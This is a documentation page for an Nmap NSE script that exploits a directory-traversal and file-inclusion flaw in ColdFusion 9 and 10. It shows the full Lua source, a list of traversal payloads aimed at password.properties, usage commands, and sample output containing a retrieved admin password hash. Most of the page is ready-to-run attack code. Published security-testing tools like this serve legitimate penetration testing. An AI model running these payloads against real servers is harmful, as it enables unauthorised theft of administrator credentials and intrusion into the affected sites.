<html><head><style>body {font-family: verdana;font-size: 0.7em;} tr {font-family: verdana;font-size: 0.7em;}</style></head><body>
<h3>File http-coldfusion-subzero</h3>
<b>Script types:</b> portrule<br/>
<b>Categories:</b> auth<br/>
<b>Author:</b> Paulino Calderon <calderon@websec.mx><br/>
<b>License:</b> <a href="https://nmap.org/book/man-legal.html" target=_blank>https://nmap.org/book/man-legal.html</a><br/>
<b>Download:</b> <a href="https://svn.nmap.org/nmap/scripts/http-coldfusion-subzero.nse">https://svn.nmap.org/nmap/scripts/http-coldfusion-subzero.nse</a><br/>
<h3>Summary</h3>
<p>Attempts to retrieve version, absolute path of administration panel and the file 'password.properties' from vulnerable installations of ColdFusion 9 and 10.</p>
<p>This was based on the exploit 'ColdSub-Zero.pyFusion v2'.</p>
<p>See also:</p>
<ul>
<li><a href="https://nmap.org/nsedoc/scripts/http-adobe-coldfusion-apsa1301.html" target=_blank>http-adobe-coldfusion-apsa1301.nse</a></li>
<li><a href="https://nmap.org/nsedoc/scripts/http-vuln-cve2009-3960.html" target=_blank>http-vuln-cve2009-3960.nse</a></li>
<li><a href="https://nmap.org/nsedoc/scripts/http-vuln-cve2010-2861.html" target=_blank>http-vuln-cve2010-2861.nse</a></li>
</ul>
<h3>Arguments</h3>
<table>
<tr><td>http-coldfusion-subzero.basepath:</td><td>Base path. Default: /.</td></tr>
<tr><td>slaxml.debug:</td><td>See the documentation for the <a href="nmap/libraries/slaxml.htm">slaxml</a> library</td></tr>
<tr><td>smbdomain:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbhash:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbnoguest:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbpassword:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbtype:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbusername:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>http.host:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-body-size:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-cache-size:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-pipeline:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.pipeline:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.truncated-ok:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.useragent:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
</table>
<h3>Usage</h3>
<pre>nmap -sV --script http-coldfusion-subzero &lt;target&gt;
nmap -p80 --script http-coldfusion-subzero --script-args basepath=/cf/ &lt;target&gt;</pre>
<h3>Output</h3>
<pre>PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-coldfusion-subzero:
|   absolute_path: C:\inetpub\wwwroot\CFIDE\adminapi\customtags
|   version: 9
|   password_properties: #Fri Mar 02 17:03:01 CST 2012
| rdspassword=
| password=AA251FD567358F16B7DE3F3B22DE8193A7517CD0
|_encrypted=true</pre>
<h3>Requirements</h3>
<ul>
<li><a href="nmap/libraries/http.htm">http</a></li>
<li><a href="nmap/libraries/shortport.htm">shortport</a></li>
<li><a href="nmap/libraries/stdnse.htm">stdnse</a></li>
<li><a href="nmap/libraries/string.htm">string</a></li>
<li><a href="nmap/libraries/url.htm">url</a></li>
<li><a href="nmap/libraries/openssl.htm">openssl</a></li>
</ul>
<h3>Code</h3>
<pre>description = [[
Attempts to retrieve version, absolute path of administration panel and the
file &#39;password.properties&#39; from vulnerable installations of ColdFusion 9 and
10.

This was based on the exploit &#39;ColdSub-Zero.pyFusion v2&#39;.
]]

---
-- @see http-adobe-coldfusion-apsa1301.nse
-- @see http-vuln-cve2009-3960.nse
-- @see http-vuln-cve2010-2861.nse
--
-- @usage nmap -sV --script http-coldfusion-subzero &lt;target&gt;
-- @usage nmap -p80 --script http-coldfusion-subzero --script-args basepath=/cf/ &lt;target&gt;
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-coldfusion-subzero:
-- |   absolute_path: C:\inetpub\wwwroot\CFIDE\adminapi\customtags
-- |   version: 9
-- |   password_properties: #Fri Mar 02 17:03:01 CST 2012
-- | rdspassword=
-- | password=AA251FD567358F16B7DE3F3B22DE8193A7517CD0
-- |_encrypted=true
--
-- @xmloutput
-- &lt;elem key=&quot;version&quot;&gt;9&lt;/elem&gt;
-- &lt;elem key=&quot;password_properties&quot;&gt;#Fri Mar 02 17:03:01 CST 2012&amp;#xd;&amp;#xa;rdspassword=&amp;#xd;&amp;#xa;password=AA251FD567358F16B7DE3F3B22DE8193A7517CD0&amp;#xd;&amp;#xa;encrypted=true&amp;#xd;&amp;#xa;&lt;/elem&gt;
-- @args http-coldfusion-subzero.basepath Base path. Default: /.
--
---

author = &quot;Paulino Calderon &lt;calderon@websec.mx&gt;&quot;
license = &quot;Same as Nmap--See https://nmap.org/book/man-legal.html&quot;
categories = {&quot;exploit&quot;}

local http = require &quot;http&quot;
local shortport = require &quot;shortport&quot;
local stdnse = require &quot;stdnse&quot;
local string = require &quot;string&quot;
local url = require &quot;url&quot;
local openssl = stdnse.silent_require &quot;openssl&quot;

portrule = shortport.http

local PATH_PAYLOAD = &quot;CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&amp;\z
attributes.file=../../administrator/analyzer/index.cfm&amp;attributes.locale=it&amp;\z
attributes.var=it&amp;attributes.jscript=false&amp;attributes.type=text/html&amp;\z
attributes.charset=UTF-8&amp;thisTag.executionmode=end&amp;thisTag.generatedContent=htp&quot;
local IMG_PAYLOAD = &quot;CFIDE/administrator/images/loginbackground.jpg&quot;
local LFI_PAYLOAD_FRAG_1 = &quot;CFIDE/adminapi/customtags/l10n.cfm?attributes.id\z
=it&amp;attributes.file=../../administrator/mail/download.cfm&amp;filename=&quot;
local LFI_PAYLOAD_FRAG_2 = &quot;&amp;attributes.locale=it&amp;attributes.var=it&amp;\z
attributes.jscript=false&amp;attributes.type=text/html&amp;attributes.charset=UTF-8&amp;\z
thisTag.executionmode=end&amp;thisTag.generatedContent=htp&quot;
local CREDENTIALS_PAYLOADS = {
  &quot;../../lib/password.properties&quot;,
  &quot;..\\..\\lib\\password.properties&quot;,
  &quot;..\\..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion10\\lib\\password.properties&quot;,
  &quot;..\\..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion10\\cfusion\\lib\\password.properties&quot;,
  &quot;..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\JRun4\\servers\\cfusion\\cfusion-ear\\cfusion-war\\WEB-INF\\cfusion\\lib\\password.properties&quot;,
  &quot;..\\..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion9\\lib\\password.properties&quot;,
  &quot;..\\..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion9\\cfusion\\lib\\password.properties&quot;,
  &quot;../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties&quot;,
  &quot;../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties&quot;,
  &quot;../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties&quot;
}

---
-- Extracts absolute path of installation by reading the ANALIZER_DIRECTORY
-- value from the header &#39;set-cookie&#39;
--
local function get_installation_path(host, port, basepath)
  local req = http.get(host, port, basepath..PATH_PAYLOAD)
  if req.header[&#39;set-cookie&#39;] then
    stdnse.debug1(&quot;Header &#39;set-cookie&#39; detected in response.&quot;)
    local _, _, path = string.find(req.header[&#39;set-cookie&#39;],
      &quot;path=/, ANALYZER_DIRECTORY=(.-);path=/&quot;)
    if path then
      stdnse.debug1(&quot;Extracted path:%s&quot;, path)
      return path
    end
  end
  return nil
end

---
-- Extracts version by comparing an image with known md5 checksums
--
local function get_version(host, port, basepath)
  local version = -1
  local img_req = http.get(host, port, basepath..IMG_PAYLOAD)
  if img_req.status == 200 then
    local md5chk = stdnse.tohex(openssl.md5(img_req.body))
    if md5chk == &quot;a4c81b7a6289b2fc9b36848fa0cae83c&quot; then
      stdnse.debug1(&quot;CF version 10 detected.&quot;)
      version = 10
    elseif md5chk == &quot;596b3fc4f1a0b818979db1cf94a82220&quot; then
      stdnse.debug1(&quot;CF version 9 detected.&quot;)
      version = 9
    elseif md5chk == &quot;&quot; then
      stdnse.debug1(&quot;CF version 8 detected.&quot;)
      version = 8
    else
      stdnse.debug1(&quot;Could not determine version.&quot;)
      version = nil
    end
  end
  return version
end

---
-- Sends malicious payloads to exploit a LFI vulnerability and extract the credentials
local function exploit(host, port, basepath)
  for i, vector in ipairs(CREDENTIALS_PAYLOADS) do
    local req = http.get(host, port, basepath..LFI_PAYLOAD_FRAG_1..vector..LFI_PAYLOAD_FRAG_2)
      if req.body and string.find(req.body, &quot;encrypted=true&quot;) then
        stdnse.debug1(&quot;String pattern found. Exploitation worked with vector &#39;%s&#39;.&quot;, vector)
        return true, req.body
      end
  end
end

action = function(host, port)
  local output_tab = stdnse.output_table()
  local basepath = stdnse.get_script_args(SCRIPT_NAME..&quot;.basepath&quot;) or &quot;/&quot;

  local installation_path = get_installation_path(host, port, basepath)
  local version_num = get_version(host, port, basepath)
  local status, file = exploit(host, port, basepath)

  if status then
    if version_num then
      output_tab.version = version_num
    end
    if installation_path then
      output_tab.installation_path = url.unescape(installation_path)
    end
    output_tab.password_properties = file
  else
    return nil
  end

  return output_tab
end</pre>
